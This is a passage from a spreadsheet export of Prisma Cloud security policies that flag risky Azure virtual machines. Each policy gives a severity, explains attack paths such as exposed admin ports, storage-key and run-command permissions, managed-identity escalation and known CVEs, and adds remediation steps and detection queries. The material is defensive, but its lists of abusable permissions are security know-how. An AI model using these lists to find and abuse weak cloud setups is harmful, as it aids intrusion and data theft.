      <c r="AC2503" t="inlineStr"/>
      <c r="AD2503" t="b">
        <v>1</v>
      </c>
      <c r="AE2503" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2503" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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03" t="inlineStr">
        <is>
          <t>bd07c19a-b148-4dd2-8248-ef9220d2cc29</t>
        </is>
      </c>
      <c r="AI2503" t="inlineStr">
        <is>
          <t>743358f5-72d1-4c96-9767-03d4b07b9421</t>
        </is>
      </c>
      <c r="AJ2503" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2503" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2504">
      <c r="A2504" t="inlineStr"/>
      <c r="B2504" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2504" s="2" t="inlineStr"/>
      <c r="D2504" t="inlineStr"/>
      <c r="E2504" t="inlineStr"/>
      <c r="F2504" t="inlineStr"/>
      <c r="G2504" t="b">
        <v>1</v>
      </c>
      <c r="H25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04" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2504" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2504" t="inlineStr">
        <is>
          <t>Cloud breach risk due to publicly exposed admin ports on Azure Virtual Machine with risky storage account permissions</t>
        </is>
      </c>
      <c r="L2504" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2504" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2504" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2504" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2504" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2504" t="inlineStr"/>
      <c r="R2504" t="inlineStr"/>
      <c r="S2504" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2504" t="b">
        <v>0</v>
      </c>
      <c r="U2504" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2504" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2504" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky storage account permissions.
Storage accounts might hold sensitive information, publicly exposed Virtual Machines with unrestricted access to admin ports (SSH / RDP) having write permission on such storage accounts may allow an attacker to damage or exfiltrate data that can adversely affect organizations
This policy checks for the following risky permissions:
'Microsoft.Storage/storageAccounts/write', 'Microsoft.Storage/storageAccounts/listKeys/action', 'Microsoft.Storage/storageAccounts/regeneratekey/action', 'Microsoft.Storage/storageAccounts/delete', 'Microsoft.Storage/storageAccounts/ListAccountSas/action'
Immediate attention is required to review risky storage account permissions and remove them if are not intended. Restrict public exposure of admin ports reported for the Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X250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04" t="inlineStr"/>
      <c r="Z2504" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports','Azure VM instance with risky Storage account permissions')</t>
        </is>
      </c>
      <c r="AA2504" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2504" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:05</t>
        </is>
      </c>
      <c r="AC2504" t="inlineStr"/>
      <c r="AD2504" t="b">
        <v>1</v>
      </c>
      <c r="AE2504" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2504" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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04" t="inlineStr">
        <is>
          <t>d26a6edc-4bbd-4f49-bae2-14046ec7fa5e</t>
        </is>
      </c>
      <c r="AI2504" t="inlineStr">
        <is>
          <t>9b29eb69-385f-43f4-9c8a-651025b15d66</t>
        </is>
      </c>
      <c r="AJ2504" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2504" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2505">
      <c r="A2505" t="inlineStr"/>
      <c r="B2505" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2505" s="2" t="inlineStr"/>
      <c r="D2505" t="inlineStr"/>
      <c r="E2505" t="inlineStr"/>
      <c r="F2505" t="inlineStr"/>
      <c r="G2505" t="b">
        <v>1</v>
      </c>
      <c r="H25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05" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2505" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2505" t="inlineStr">
        <is>
          <t>Unauthorized critical database service modifications risk due to a publicly exposed and vulnerable Azure Virtual Machine with database management 'write' permissions</t>
        </is>
      </c>
      <c r="L2505" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2505" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2505" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2505" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2505" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2505" t="inlineStr"/>
      <c r="R2505" t="inlineStr"/>
      <c r="S2505" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2505" t="b">
        <v>0</v>
      </c>
      <c r="U2505" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2505" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2505" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed with critical or high vulnerabilities and have database management write access permissions. 
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Virtual Machines with database management write access permissions could further expand the surface of the attack and grant unauthorized modifications to critical database services hosted on Azure. 
This policy checks for the following risky database management write access permissions: 
'Microsoft.Cache/redisEnterprise/databases/write', 'Microsoft.DataMigration/databaseMigrations/write', 'Microsoft.DBforMariaDB/servers/databases/write', 'Microsoft.DBforMySQL/flexibleServers/databases/write', 'Microsoft.DBforMySQL/servers/databases/write', 'Microsoft.DBforPostgreSQL/flexibleServers/databases/write', 'Microsoft.DBforPostgreSQL/servers/databases/write', 'Microsoft.DocumentDB/databaseAccounts/write', 'Microsoft.Sql/managedInstances/databases/write', 'Microsoft.Sql/servers/databases/write', 'Microsoft.SqlVirtualMachine/sqlVirtualMachines/write'
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X250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the Azure Management Console.
2. Navigate to the Azure Subscriptions blade by visiting https://portal.azure.com/#blade/Microsoft_Azure_Billing/SubscriptionsBlade.
3. Click on the Azure cloud subscription that you want to examine
4. Navigate to the “Resources”
5. Locate the VM instance that is violating the policy.
6. In the navigation panel, choose 'Access control (IAM)' and select the 'Role Assignments' tab to access the role bindings for the selected subscription
7. Identify the assignment between the VM and the role that grants permissions for database management write access
8. Remove the assignment associated with the VM and the role with database management write access permissions
9. If necessary, create a new assignment using a built-in or custom role that does not include risky permissions for database management write access
'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05" t="inlineStr"/>
      <c r="Z2505" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure VM instance with database management write access permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2505" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2505" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2505" t="inlineStr"/>
      <c r="AD2505" t="b">
        <v>1</v>
      </c>
      <c r="AE2505" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2505" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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05" t="inlineStr">
        <is>
          <t>c2405ea7-486d-45b4-a053-2a58289a6430</t>
        </is>
      </c>
      <c r="AI2505" t="inlineStr">
        <is>
          <t>623c298e-0a92-4d8d-a2c1-bacc064aa145</t>
        </is>
      </c>
      <c r="AJ2505" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2505" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2506">
      <c r="A2506" t="inlineStr"/>
      <c r="B2506" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2506" s="2" t="inlineStr"/>
      <c r="D2506" t="inlineStr"/>
      <c r="E2506" t="inlineStr"/>
      <c r="F2506" t="inlineStr"/>
      <c r="G2506" t="b">
        <v>1</v>
      </c>
      <c r="H25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06" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2506" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2506" t="inlineStr">
        <is>
          <t>Lateral movement and unauthorized command execution risk due to a publicly exposed and vulnerable Azure Virtual Machine with Run Commands permissions</t>
        </is>
      </c>
      <c r="L2506" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2506" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2506" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2506" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2506" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2506" t="inlineStr"/>
      <c r="R2506" t="inlineStr"/>
      <c r="S2506" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2506" t="b">
        <v>0</v>
      </c>
      <c r="U2506" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2506" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2506" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed with critical or high vulnerabilities and have run command execution permissions.
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The Run command execution permissions on the instance further could allow attackers to execute scripts or commands on the virtual machine and could laterally move across cloud accounts.
This policy checks for the following risky permissions:
'Microsoft.Compute/virtualMachines/runCommands/write', 'Microsoft.Compute/virtualMachines/runCommand/action'
Immediate attention is required to review run command execution permissions and remove if is not intended, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X250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if necessary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06" t="inlineStr"/>
      <c r="Z2506" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure VM instance with Run command permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2506" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2506" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2506" t="inlineStr"/>
      <c r="AD2506" t="b">
        <v>1</v>
      </c>
      <c r="AE2506" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2506" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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06" t="inlineStr">
        <is>
          <t>469d5c1d-cb21-46aa-b769-0638853f2144</t>
        </is>
      </c>
      <c r="AI2506" t="inlineStr">
        <is>
          <t>fd4e4124-68f9-4cd9-b725-c4b662070f06</t>
        </is>
      </c>
      <c r="AJ2506" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2506" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2507">
      <c r="A2507" t="inlineStr"/>
      <c r="B2507" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2507" s="2" t="inlineStr"/>
      <c r="D2507" t="inlineStr"/>
      <c r="E2507" t="inlineStr"/>
      <c r="F2507" t="inlineStr"/>
      <c r="G2507" t="b">
        <v>1</v>
      </c>
      <c r="H25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07" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2507" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2507" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed Azure Virtual Machine with Probllama vulnerability (Ollama, CVE-2024-37032)</t>
        </is>
      </c>
      <c r="L2507" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2507" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2507" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2507" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2507" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2507" t="inlineStr"/>
      <c r="R2507" t="inlineStr"/>
      <c r="S2507" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2507" t="b">
        <v>0</v>
      </c>
      <c r="U2507" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2507" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2507" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual machines that are publicly exposed and have known exploitable Remote Code Execution vulnerability named Probllama (CVE-2024-37032).
Ollama is a service for packaging, deploying, and running large language models (LLMs) locally on Windows, Linux, and macOS devices. CVE-2024-37032 exploits a path traversal flaw in Ollama's file upload functionality, enabling an attacker to upload a malicious file, traverse directories, and execute arbitrary code. The fact that the Virtual machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Ollama (CVE-2024-37032) vulnerability and public exposure reported for the Azure Virtual machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2507" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported Virtual machines based on your business requirements by modifying Network security group rules to the trusted IP address.
To modify Network security group rules,
1. Sign in to the Azure Portal
2. Select 'All services'
3. Select 'Virtual Machines' under Compute
4. Identify the Virtual machine that you want to restrict access to the Internet
4. Under 'Settings' click on 'Networking'
5. In the 'Inbound port rules' section, select the rule that allows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ensure you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-37032
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-37032</t>
        </is>
      </c>
      <c r="Y2507" t="inlineStr"/>
      <c r="Z2507" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-37032'))</t>
        </is>
      </c>
      <c r="AA2507" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2507" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:43</t>
        </is>
      </c>
      <c r="AC2507" t="inlineStr"/>
      <c r="AD2507" t="b">
        <v>1</v>
      </c>
      <c r="AE2507" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2507" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>8571d727-8764-4a33-bb24-47c39ff16710</t>
        </is>
      </c>
      <c r="AI2507" t="inlineStr">
        <is>
          <t>cb1a1a1e-c935-4b0d-a035-7722e219f33d</t>
        </is>
      </c>
      <c r="AJ2507" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2507" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2508">
      <c r="A2508" t="inlineStr"/>
      <c r="B2508" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2508" s="2" t="inlineStr"/>
      <c r="D2508" t="inlineStr"/>
      <c r="E2508" t="inlineStr"/>
      <c r="F2508" t="inlineStr"/>
      <c r="G2508" t="b">
        <v>1</v>
      </c>
      <c r="H25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08" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2508" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2508" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed and vulnerable Azure Virtual Machine assigned with privilege managed identity permission</t>
        </is>
      </c>
      <c r="L2508" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2508" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2508" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2508" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2508" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2508" t="inlineStr"/>
      <c r="R2508" t="inlineStr"/>
      <c r="S2508" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2508" t="b">
        <v>0</v>
      </c>
      <c r="U2508" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2508" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2508" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed and vulnerable Azure Virtual Machines that are assigned with privilege managed identity permission.
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Azure Virtual machine assigned with managed identities could assign them to themselves, obtaining the additional permissions granted to the managed identity, escalating their privileges within the environment. This would allow them to further enumerate and exploit the environment.
Immediate attention is required to grant the least privileges required and remove unwanted risky managed identity permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2508" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to Azure Virtual machine by modifying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1. Sign in to Azure Console
2.Navigate to the Compute instance, and remove the attached role, or edit it and remove the excessive permissions.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08" t="inlineStr"/>
      <c r="Z2508" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ( 'azure-vm-list' ) and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure Compute Resource Assigned Managed Identity Assignment Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2508" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2508" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:46</t>
        </is>
      </c>
      <c r="AC2508" t="inlineStr"/>
      <c r="AD2508" t="b">
        <v>1</v>
      </c>
      <c r="AE2508" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2508" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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08" t="inlineStr">
        <is>
          <t>c37ed2dc-9ba5-48f7-9176-58910c0abdbe</t>
        </is>
      </c>
      <c r="AI2508" t="inlineStr">
        <is>
          <t>8ef93b68-60a2-4464-b708-04d524f51147</t>
        </is>
      </c>
      <c r="AJ2508" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2508" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2509">
      <c r="A2509" t="inlineStr"/>
      <c r="B2509" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2509" s="2" t="inlineStr"/>
      <c r="D2509" t="inlineStr"/>
      <c r="E2509" t="inlineStr"/>
      <c r="F2509" t="inlineStr"/>
      <c r="G2509" t="b">
        <v>1</v>
      </c>
      <c r="H25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09" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2509" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2509" t="inlineStr">
        <is>
          <t>Authentication bypass (BAC) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Confluence, CVE-2022-26138]</t>
        </is>
      </c>
      <c r="L2509" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2509" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2509" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2509" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2509" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2509" t="inlineStr"/>
      <c r="R2509" t="inlineStr"/>
      <c r="S2509" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2509" t="b">
        <v>0</v>
      </c>
      <c r="U2509" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2509" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2509" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [Confluence, CVE-2022-26138]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Confluence software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Confluence authentication bypass [CVE-2022-26138] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X250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CVE-2022-26138
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-26138</t>
        </is>
      </c>
      <c r="Y2509" t="inlineStr"/>
      <c r="Z2509" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-26138 - Confluence authentication bypass) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-26138'))</t>
        </is>
      </c>
      <c r="AA2509" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2509" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:42</t>
        </is>
      </c>
      <c r="AC2509" t="inlineStr"/>
      <c r="AD2509" t="b">
        <v>1</v>
      </c>
      <c r="AE2509" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2509" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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09" t="inlineStr">
        <is>
          <t>0a31a1d7-ea5e-4358-ba77-0546c23974ae</t>
        </is>
      </c>
      <c r="AI2509" t="inlineStr">
        <is>
          <t>1f72d151-3152-49d7-95be-c3ecab881c6a</t>
        </is>
      </c>
      <c r="AJ2509" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2509" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2510">
      <c r="A2510" t="inlineStr"/>
      <c r="B2510" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2510" s="2" t="inlineStr"/>
      <c r="D2510" t="inlineStr"/>
      <c r="E2510" t="inlineStr"/>
      <c r="F2510" t="inlineStr"/>
      <c r="G2510" t="b">
        <v>1</v>
      </c>
      <c r="H25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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2510" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2510" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine [ClamAV, CVE-2023-20032]</t>
        </is>
      </c>
      <c r="L2510" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2510" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2510" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2510" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2510" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2510" t="inlineStr"/>
      <c r="R2510" t="inlineStr"/>
      <c r="S2510" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2510" t="b">
        <v>0</v>
      </c>
      <c r="U2510" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2510" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2510" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2023-20032].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the ClamAV [CVE-2023-20032] vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X251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CVE-2023-20032
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-20032</t>
        </is>
      </c>
      <c r="Y2510" t="inlineStr"/>
      <c r="Z2510" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-20032'))</t>
        </is>
      </c>
      <c r="AA2510" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2510" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2510" t="inlineStr"/>
      <c r="AD2510" t="b">
        <v>1</v>
      </c>
      <c r="AE2510" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2510" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>bade77ff-c4c2-4adf-b9d5-3bc197e903f5</t>
        </is>
      </c>
      <c r="AI2510" t="inlineStr">
        <is>
          <t>27e7bf74-5d84-4441-ad33-a1c122ab2320</t>
        </is>
      </c>
      <c r="AJ2510" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2510" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2511">
      <c r="A2511" t="inlineStr"/>
      <c r="B2511" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2511" s="2" t="inlineStr"/>
      <c r="D2511" t="inlineStr"/>
      <c r="E2511" t="inlineStr"/>
      <c r="F2511" t="inlineStr"/>
      <c r="G2511" t="b">
        <v>1</v>
      </c>
      <c r="H25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11" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2511" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2511" t="inlineStr">
        <is>
          <t>Command Injection risk due to publicly exposed Azure Virtual Machine with PyTorch vulnerability (Python, CVE-2024-5480)</t>
        </is>
      </c>
      <c r="L2511" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2511" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2511" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2511" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2511" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2511" t="inlineStr"/>
      <c r="R2511" t="inlineStr"/>
      <c r="S2511" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2511" t="b">
        <v>0</v>
      </c>
      <c r="U2511" t="inlineStr">
        <is>
